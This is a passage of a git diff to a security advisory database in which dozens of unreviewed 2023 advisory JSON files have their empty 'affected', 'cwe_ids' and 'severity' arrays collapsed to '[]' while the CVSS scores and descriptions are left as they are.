b/advisories/unreviewed/2023/09/GHSA-fr9w-7fqw-r7xj/GHSA-fr9w-7fqw-r7xj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-m4hq-98c3-4xmx/GHSA-m4hq-98c3-4xmx.json b/advisories/unreviewed/2023/09/GHSA-m4hq-98c3-4xmx/GHSA-m4hq-98c3-4xmx.json index 1235266b4d8..a9455684aae 100644 --- a/advisories/unreviewed/2023/09/GHSA-m4hq-98c3-4xmx/GHSA-m4hq-98c3-4xmx.json +++ b/advisories/unreviewed/2023/09/GHSA-m4hq-98c3-4xmx/GHSA-m4hq-98c3-4xmx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-ppjq-2qhc-pjp7/GHSA-ppjq-2qhc-pjp7.json b/advisories/unreviewed/2023/09/GHSA-ppjq-2qhc-pjp7/GHSA-ppjq-2qhc-pjp7.json index 895bbac17f6..e0593f26b1c 100644 --- a/advisories/unreviewed/2023/09/GHSA-ppjq-2qhc-pjp7/GHSA-ppjq-2qhc-pjp7.json +++ b/advisories/unreviewed/2023/09/GHSA-ppjq-2qhc-pjp7/GHSA-ppjq-2qhc-pjp7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-v9r7-fcc3-gg2v/GHSA-v9r7-fcc3-gg2v.json b/advisories/unreviewed/2023/09/GHSA-v9r7-fcc3-gg2v/GHSA-v9r7-fcc3-gg2v.json index 18288551224..16e38b99a24 100644 --- a/advisories/unreviewed/2023/09/GHSA-v9r7-fcc3-gg2v/GHSA-v9r7-fcc3-gg2v.json +++ b/advisories/unreviewed/2023/09/GHSA-v9r7-fcc3-gg2v/GHSA-v9r7-fcc3-gg2v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-wc9w-6v27-vh63/GHSA-wc9w-6v27-vh63.json b/advisories/unreviewed/2023/09/GHSA-wc9w-6v27-vh63/GHSA-wc9w-6v27-vh63.json index 1ce81f31f6a..2c01f779971 100644 --- a/advisories/unreviewed/2023/09/GHSA-wc9w-6v27-vh63/GHSA-wc9w-6v27-vh63.json +++ b/advisories/unreviewed/2023/09/GHSA-wc9w-6v27-vh63/GHSA-wc9w-6v27-vh63.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-3f63-w59m-x8ff/GHSA-3f63-w59m-x8ff.json b/advisories/unreviewed/2023/10/GHSA-3f63-w59m-x8ff/GHSA-3f63-w59m-x8ff.json index 6e47541107f..c8b0ceb05c9 100644 --- a/advisories/unreviewed/2023/10/GHSA-3f63-w59m-x8ff/GHSA-3f63-w59m-x8ff.json +++ b/advisories/unreviewed/2023/10/GHSA-3f63-w59m-x8ff/GHSA-3f63-w59m-x8ff.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-45jf-w8f5-5pm8/GHSA-45jf-w8f5-5pm8.json b/advisories/unreviewed/2023/10/GHSA-45jf-w8f5-5pm8/GHSA-45jf-w8f5-5pm8.json index 1c1eb3335b0..9440330e9dd 100644 --- a/advisories/unreviewed/2023/10/GHSA-45jf-w8f5-5pm8/GHSA-45jf-w8f5-5pm8.json +++ b/advisories/unreviewed/2023/10/GHSA-45jf-w8f5-5pm8/GHSA-45jf-w8f5-5pm8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-5c37-6j7c-hr7x/GHSA-5c37-6j7c-hr7x.json b/advisories/unreviewed/2023/10/GHSA-5c37-6j7c-hr7x/GHSA-5c37-6j7c-hr7x.json index 258bff47b81..e773e27cb98 100644 --- a/advisories/unreviewed/2023/10/GHSA-5c37-6j7c-hr7x/GHSA-5c37-6j7c-hr7x.json +++ b/advisories/unreviewed/2023/10/GHSA-5c37-6j7c-hr7x/GHSA-5c37-6j7c-hr7x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/10/GHSA-5p7g-qx77-8f6h/GHSA-5p7g-qx77-8f6h.json b/advisories/unreviewed/2023/10/GHSA-5p7g-qx77-8f6h/GHSA-5p7g-qx77-8f6h.json index 039235c9dc2..57f88e32005 100644 --- a/advisories/unreviewed/2023/10/GHSA-5p7g-qx77-8f6h/GHSA-5p7g-qx77-8f6h.json +++ b/advisories/unreviewed/2023/10/GHSA-5p7g-qx77-8f6h/GHSA-5p7g-qx77-8f6h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/10/GHSA-5vg3-8c2w-qh9w/GHSA-5vg3-8c2w-qh9w.json b/advisories/unreviewed/2023/10/GHSA-5vg3-8c2w-qh9w/GHSA-5vg3-8c2w-qh9w.json index 4f5a0758507..dc334fcd8f1 100644 --- a/advisories/unreviewed/2023/10/GHSA-5vg3-8c2w-qh9w/GHSA-5vg3-8c2w-qh9w.json +++ b/advisories/unreviewed/2023/10/GHSA-5vg3-8c2w-qh9w/GHSA-5vg3-8c2w-qh9w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/10/GHSA-8q5r-gmrx-88jx/GHSA-8q5r-gmrx-88jx.json b/advisories/unreviewed/2023/10/GHSA-8q5r-gmrx-88jx/GHSA-8q5r-gmrx-88jx.json index 1c83942b03b..e54e848c2f8 100644 --- a/advisories/unreviewed/2023/10/GHSA-8q5r-gmrx-88jx/GHSA-8q5r-gmrx-88jx.json +++ b/advisories/unreviewed/2023/10/GHSA-8q5r-gmrx-88jx/GHSA-8q5r-gmrx-88jx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-923j-p84j-2899/GHSA-923j-p84j-2899.json b/advisories/unreviewed/2023/10/GHSA-923j-p84j-2899/GHSA-923j-p84j-2899.json index a3c2232c746..d8f98b74dc6 100644 --- a/advisories/unreviewed/2023/10/GHSA-923j-p84j-2899/GHSA-923j-p84j-2899.json +++ b/advisories/unreviewed/2023/10/GHSA-923j-p84j-2899/GHSA-923j-p84j-2899.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-99gf-96v5-5648/GHSA-99gf-96v5-5648.json b/advisories/unreviewed/2023/10/GHSA-99gf-96v5-5648/GHSA-99gf-96v5-5648.json index 8d67585dfee..d311b422ee1 100644 --- a/advisories/unreviewed/2023/10/GHSA-99gf-96v5-5648/GHSA-99gf-96v5-5648.json +++ b/advisories/unreviewed/2023/10/GHSA-99gf-96v5-5648/GHSA-99gf-96v5-5648.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-chxc-x49q-7m83/GHSA-chxc-x49q-7m83.json b/advisories/unreviewed/2023/10/GHSA-chxc-x49q-7m83/GHSA-chxc-x49q-7m83.json index 71d1e5691fd..2f1d013f810 100644 --- a/advisories/unreviewed/2023/10/GHSA-chxc-x49q-7m83/GHSA-chxc-x49q-7m83.json +++ b/advisories/unreviewed/2023/10/GHSA-chxc-x49q-7m83/GHSA-chxc-x49q-7m83.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-cr5c-98rh-fgj3/GHSA-cr5c-98rh-fgj3.json b/advisories/unreviewed/2023/10/GHSA-cr5c-98rh-fgj3/GHSA-cr5c-98rh-fgj3.json index 9bfedfaa031..079f47481c4 100644 --- a/advisories/unreviewed/2023/10/GHSA-cr5c-98rh-fgj3/GHSA-cr5c-98rh-fgj3.json +++ b/advisories/unreviewed/2023/10/GHSA-cr5c-98rh-fgj3/GHSA-cr5c-98rh-fgj3.json @@ -7,12 +7,8 @@ "CVE-2023-40790" ], "details": "** DISPUTED ** An issue was discovered in the Linux kernel through 6.5.7. kvm_arch_vcpu_ioctl_run in arch/x86/kvm/x86.c allows a WARN_ON_ONCE if userspace stuffs a nonsensical vCPU state.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/10/GHSA-cxxg-52f9-f5mj/GHSA-cxxg-52f9-f5mj.json b/advisories/unreviewed/2023/10/GHSA-cxxg-52f9-f5mj/GHSA-cxxg-52f9-f5mj.json index 212180fd18a..4e97fba62ac 100644 --- a/advisories/unreviewed/2023/10/GHSA-cxxg-52f9-f5mj/GHSA-cxxg-52f9-f5mj.json +++ b/advisories/unreviewed/2023/10/GHSA-cxxg-52f9-f5mj/GHSA-cxxg-52f9-f5mj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/10/GHSA-fcfg-fc3h-p824/GHSA-fcfg-fc3h-p824.json b/advisories/unreviewed/2023/10/GHSA-fcfg-fc3h-p824/GHSA-fcfg-fc3h-p824.json index a271a19ec69..65fb7943f15 100644 --- a/advisories/unreviewed/2023/10/GHSA-fcfg-fc3h-p824/GHSA-fcfg-fc3h-p824.json +++ b/advisories/unreviewed/2023/10/GHSA-fcfg-fc3h-p824/GHSA-fcfg-fc3h-p824.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-hf5c-mhxv-g773/GHSA-hf5c-mhxv-g773.json b/advisories/unreviewed/2023/10/GHSA-hf5c-mhxv-g773/GHSA-hf5c-mhxv-g773.json index 698f0bc8b88..6c2a4787d29 100644 --- a/advisories/unreviewed/2023/10/GHSA-hf5c-mhxv-g773/GHSA-hf5c-mhxv-g773.json +++ b/advisories/unreviewed/2023/10/GHSA-hf5c-mhxv-g773/GHSA-hf5c-mhxv-g773.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-q39j-4ch7-55c3/GHSA-q39j-4ch7-55c3.json b/advisories/unreviewed/2023/10/GHSA-q39j-4ch7-55c3/GHSA-q39j-4ch7-55c3.json index 307d7a80178..bdb4cc30f4c 100644 --- a/advisories/unreviewed/2023/10/GHSA-q39j-4ch7-55c3/GHSA-q39j-4ch7-55c3.json +++ b/advisories/unreviewed/2023/10/GHSA-q39j-4ch7-55c3/GHSA-q39j-4ch7-55c3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-qg5r-9v52-4mfm/GHSA-qg5r-9v52-4mfm.json b/advisories/unreviewed/2023/10/GHSA-qg5r-9v52-4mfm/GHSA-qg5r-9v52-4mfm.json index d1a27a74ac9..8d6e7e846db 100644 --- a/advisories/unreviewed/2023/10/GHSA-qg5r-9v52-4mfm/GHSA-qg5r-9v52-4mfm.json +++ b/advisories/unreviewed/2023/10/GHSA-qg5r-9v52-4mfm/GHSA-qg5r-9v52-4mfm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-v69j-q2rv-25rq/GHSA-v69j-q2rv-25rq.json b/advisories/unreviewed/2023/10/GHSA-v69j-q2rv-25rq/GHSA-v69j-q2rv-25rq.json index 82343663fe2..76f4e07ca57 100644 --- a/advisories/unreviewed/2023/10/GHSA-v69j-q2rv-25rq/GHSA-v69j-q2rv-25rq.json +++ b/advisories/unreviewed/2023/10/GHSA-v69j-q2rv-25rq/GHSA-v69j-q2rv-25rq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-vhm9-v8x6-w764/GHSA-vhm9-v8x6-w764.json b/advisories/unreviewed/2023/10/GHSA-vhm9-v8x6-w764/GHSA-vhm9-v8x6-w764.json index ed3d4a88c4a..2a071b5d8e3 100644 --- a/advisories/unreviewed/2023/10/GHSA-vhm9-v8x6-w764/GHSA-vhm9-v8x6-w764.json +++ b/advisories/unreviewed/2023/10/GHSA-vhm9-v8x6-w764/GHSA-vhm9-v8x6-w764.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/10/GHSA-w4qw-rxr9-pgfx/GHSA-w4qw-rxr9-pgfx.json b/advisories/unreviewed/2023/10/GHSA-w4qw-rxr9-pgfx/GHSA-w4qw-rxr9-pgfx.json index 14f677e48b4..b7167636422 100644 --- a/advisories/unreviewed/2023/10/GHSA-w4qw-rxr9-pgfx/GHSA-w4qw-rxr9-pgfx.json +++ b/advisories/unreviewed/2023/10/GHSA-w4qw-rxr9-pgfx/GHSA-w4qw-rxr9-pgfx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-w7rp-q53m-mxf8/GHSA-w7rp-q53m-mxf8.json b/advisories/unreviewed/2023/10/GHSA-w7rp-q53m-mxf8/GHSA-w7rp-q53m-mxf8.json index 12f061e60d6..c167f4ee209 100644 --- a/advisories/unreviewed/2023/10/GHSA-w7rp-q53m-mxf8/GHSA-w7rp-q53m-mxf8.json +++ b/advisories/unreviewed/2023/10/GHSA-w7rp-q53m-mxf8/GHSA-w7rp-q53m-mxf8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-wp7x-2348-v58r/GHSA-wp7x-2348-v58r.json b/advisories/unreviewed/2023/10/GHSA-wp7x-2348-v58r/GHSA-wp7x-2348-v58r.json index 041a00fc27c..3c12c5af6d7 100644 --- a/advisories/unreviewed/2023/10/GHSA-wp7x-2348-v58r/GHSA-wp7x-2348-v58r.json +++ b/advisories/unreviewed/2023/10/GHSA-wp7x-2348-v58r/GHSA-wp7x-2348-v58r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -59,9 +57,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/10/GHSA-xc57-835q-7qqh/GHSA-xc57-835q-7qqh.json b/advisories/unreviewed/2023/10/GHSA-xc57-835q-7qqh/GHSA-xc57-835q-7qqh.json index fdea00be37f..6fb3d5c2bd9 100644 --- a/advisories/unreviewed/2023/10/GHSA-xc57-835q-7qqh/GHSA-xc57-835q-7qqh.json +++ b/advisories/unreviewed/2023/10/GHSA-xc57-835q-7qqh/GHSA-xc57-835q-7qqh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/11/GHSA-4cgw-v6r3-9jcg/GHSA-4cgw-v6r3-9jcg.json b/advisories/unreviewed/2023/11/GHSA-4cgw-v6r3-9jcg/GHSA-4cgw-v6r3-9jcg.json index 237694a782b..44a1355158c 100644 --- a/advisories/unreviewed/2023/11/GHSA-4cgw-v6r3-9jcg/GHSA-4cgw-v6r3-9jcg.json +++ b/advisories/unreviewed/2023/11/GHSA-4cgw-v6r3-9jcg/GHSA-4cgw-v6r3-9jcg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/11/GHSA-53xh-mr6w-445f/GHSA-53xh-mr6w-445f.json b/advisories/unreviewed/2023/11/GHSA-53xh-mr6w-445f/GHSA-53xh-mr6w-445f.json index 48565fb60ae..e34009f5cf1 100644 --- a/advisories/unreviewed/2023/11/GHSA-53xh-mr6w-445f/GHSA-53xh-mr6w-445f.json +++ b/advisories/unreviewed/2023/11/GHSA-53xh-mr6w-445f/GHSA-53xh-mr6w-445f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/11/GHSA-5rfm-2gcw-59ww/GHSA-5rfm-2gcw-59ww.json b/advisories/unreviewed/2023/11/GHSA-5rfm-2gcw-59ww/GHSA-5rfm-2gcw-59ww.json index bcfb94fa91c..22f73a29aa1 100644 --- a/advisories/unreviewed/2023/11/GHSA-5rfm-2gcw-59ww/GHSA-5rfm-2gcw-59ww.json +++ b/advisories/unreviewed/2023/11/GHSA-5rfm-2gcw-59ww/GHSA-5rfm-2gcw-59ww.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/11/GHSA-87vv-rrw7-r5qx/GHSA-87vv-rrw7-r5qx.json b/advisories/unreviewed/2023/11/GHSA-87vv-rrw7-r5qx/GHSA-87vv-rrw7-r5qx.json index 7eb8ab2f7d1..1c9c7e28e23 100644 --- a/advisories/unreviewed/2023/11/GHSA-87vv-rrw7-r5qx/GHSA-87vv-rrw7-r5qx.json +++ b/advisories/unreviewed/2023/11/GHSA-87vv-rrw7-r5qx/GHSA-87vv-rrw7-r5qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/11/GHSA-j8mj-5fpw-2pc8/GHSA-j8mj-5fpw-2pc8.json b/advisories/unreviewed/2023/11/GHSA-j8mj-5fpw-2pc8/GHSA-j8mj-5fpw-2pc8.json index 6af44f0f5c9..51eec8678f8 100644 --- a/advisories/unreviewed/2023/11/GHSA-j8mj-5fpw-2pc8/GHSA-j8mj-5fpw-2pc8.json +++ b/advisories/unreviewed/2023/11/GHSA-j8mj-5fpw-2pc8/GHSA-j8mj-5fpw-2pc8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/11/GHSA-qrp8-hgrf-wv83/GHSA-qrp8-hgrf-wv83.json b/advisories/unreviewed/2023/11/GHSA-qrp8-hgrf-wv83/GHSA-qrp8-hgrf-wv83.json index d925b2d5b8d..6b12becc905 100644 --- a/advisories/unreviewed/2023/11/GHSA-qrp8-hgrf-wv83/GHSA-qrp8-hgrf-wv83.json +++ b/advisories/unreviewed/2023/11/GHSA-qrp8-hgrf-wv83/GHSA-qrp8-hgrf-wv83.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/11/GHSA-wrm3-h327-j8wh/GHSA-wrm3-h327-j8wh.json b/advisories/unreviewed/2023/11/GHSA-wrm3-h327-j8wh/GHSA-wrm3-h327-j8wh.json index afaedeca744..2665d510f97 100644 --- a/advisories/unreviewed/2023/11/GHSA-wrm3-h327-j8wh/GHSA-wrm3-h327-j8wh.json +++ b/advisories/unreviewed/2023/11/GHSA-wrm3-h327-j8wh/GHSA-wrm3-h327-j8wh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-33j6-gqw4-wvvg/GHSA-33j6-gqw4-wvvg.json b/advisories/unreviewed/2023/12/GHSA-33j6-gqw4-wvvg/GHSA-33j6-gqw4-wvvg.json index 7403820cd03..6625b666658 100644 --- a/advisories/unreviewed/2023/12/GHSA-33j6-gqw4-wvvg/GHSA-33j6-gqw4-wvvg.json +++ b/advisories/unreviewed/2023/12/GHSA-33j6-gqw4-wvvg/GHSA-33j6-gqw4-wvvg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-5p8h-m559-wpw7/GHSA-5p8h-m559-wpw7.json b/advisories/unreviewed/2023/12/GHSA-5p8h-m559-wpw7/GHSA-5p8h-m559-wpw7.json index b2635ab6684..d6d001aac50 100644 --- a/advisories/unreviewed/2023/12/GHSA-5p8h-m559-wpw7/GHSA-5p8h-m559-wpw7.json +++ b/advisories/unreviewed/2023/12/GHSA-5p8h-m559-wpw7/GHSA-5p8h-m559-wpw7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-625m-28mg-rq98/GHSA-625m-28mg-rq98.json b/advisories/unreviewed/2023/12/GHSA-625m-28mg-rq98/GHSA-625m-28mg-rq98.json index 478c343a9a4..c7a8227ccd9 100644 --- a/advisories/unreviewed/2023/12/GHSA-625m-28mg-rq98/GHSA-625m-28mg-rq98.json +++ b/advisories/unreviewed/2023/12/GHSA-625m-28mg-rq98/GHSA-625m-28mg-rq98.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-6q84-3g95-w6vx/GHSA-6q84-3g95-w6vx.json b/advisories/unreviewed/2023/12/GHSA-6q84-3g95-w6vx/GHSA-6q84-3g95-w6vx.json index c159474b3cd..76420044d2b 100644 --- a/advisories/unreviewed/2023/12/GHSA-6q84-3g95-w6vx/GHSA-6q84-3g95-w6vx.json +++ b/advisories/unreviewed/2023/12/GHSA-6q84-3g95-w6vx/GHSA-6q84-3g95-w6vx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-7m6x-h8vx-f72m/GHSA-7m6x-h8vx-f72m.json b/advisories/unreviewed/2023/12/GHSA-7m6x-h8vx-f72m/GHSA-7m6x-h8vx-f72m.json index 12df2a70517..b282b63320c 100644 --- a/advisories/unreviewed/2023/12/GHSA-7m6x-h8vx-f72m/GHSA-7m6x-h8vx-f72m.json +++ b/advisories/unreviewed/2023/12/GHSA-7m6x-h8vx-f72m/GHSA-7m6x-h8vx-f72m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-8fgm-gj9v-6jr5/GHSA-8fgm-gj9v-6jr5.json b/advisories/unreviewed/2023/12/GHSA-8fgm-gj9v-6jr5/GHSA-8fgm-gj9v-6jr5.json index 91de98ee1e8..ba78f70dad7 100644 --- a/advisories/unreviewed/2023/12/GHSA-8fgm-gj9v-6jr5/GHSA-8fgm-gj9v-6jr5.json +++ b/advisories/unreviewed/2023/12/GHSA-8fgm-gj9v-6jr5/GHSA-8fgm-gj9v-6jr5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-c3hq-3p4c-ch2w/GHSA-c3hq-3p4c-ch2w.json b/advisories/unreviewed/2023/12/GHSA-c3hq-3p4c-ch2w/GHSA-c3hq-3p4c-ch2w.json index 8fecc0bd581..246bea3b350 100644 --- a/advisories/unreviewed/2023/12/GHSA-c3hq-3p4c-ch2w/GHSA-c3hq-3p4c-ch2w.json +++ b/advisories/unreviewed/2023/12/GHSA-c3hq-3p4c-ch2w/GHSA-c3hq-3p4c-ch2w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/12/GHSA-c9fp-5g2h-59m2/GHSA-c9fp-5g2h-59m2.json b/advisories/unreviewed/2023/12/GHSA-c9fp-5g2h-59m2/GHSA-c9fp-5g2h-59m2.json index 4c92e37930a..6f94cce37cc 100644 --- a/advisories/unreviewed/2023/12/GHSA-c9fp-5g2h-59m2/GHSA-c9fp-5g2h-59m2.json +++ b/advisories/unreviewed/2023/12/GHSA-c9fp-5g2h-59m2/GHSA-c9fp-5g2h-59m2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 